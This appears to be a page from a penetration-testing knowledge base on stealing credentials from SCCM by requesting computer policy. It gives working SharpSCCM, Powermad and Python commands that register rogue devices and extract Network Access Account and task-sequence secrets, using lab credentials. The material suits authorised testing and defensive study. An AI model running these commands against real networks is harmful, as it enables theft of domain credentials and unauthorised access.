CRED-2 - Policy Request Credentials

Document Reference


Request computer policy and deobfuscate secrets


  • PKI certificates are not required for client authentication

Additionally, any of the below requirements can be met to perform this attack.

  • Domain Computer credentials

  • The ability to create computer objects (MachineAccountQuota)

  • Local administrator on a SCCM client


Local Administrator on SCCM Client

If you are a local administrator or running as SYSTEM on a SCCM client. We can simply request the computer policy without specifying any credentials

SharpSCCM.exe get secrets

Using Domain Computer Credentials

If we have a password for a domain computer account we can use this directly with SharpSCCM to register a new device

SharpSCCM.exe get secrets -r EvilDevice -u mecm$ -p 'I(A*r@KqUuoj5oHFO=<--Snip>-->'

Machine Account Quota

Create new machine account with Powermad

New-MachineAccount -MachineAccount  EvilSCCM$ -Domain sccm.lab -DomainController

Use SharpSCCM to request policy for the new account

# get secrets is preferred over naa due to secrets potentially containing further
# credentials from task sequences and collection varaibles

SharpSCCM.exe get secrets -r newdevice -u EvilSCCM$ -p Evil123
SharpSCCM.exe get naa -r newdevice -u EvilSCCM$ -p Evil123



# auto, requires user credentials and MachineAccountQuota greater than 0
python3 http -u standard-user -p 'Password1!' -d sccm.lab -dc-ip -auto -sleep 30

# Manual, requires user credentials and computer account credentials
python3 http -u standard-user -p 'Password1!' -d sccm.lab -dc-ip -cn 'EvilRiley$' -cp Evil123 -sleep 30

This will create a device object within SCCM. Ensure that when on an engagement, the client is informed and request for it to be deleted once completed.

Last updated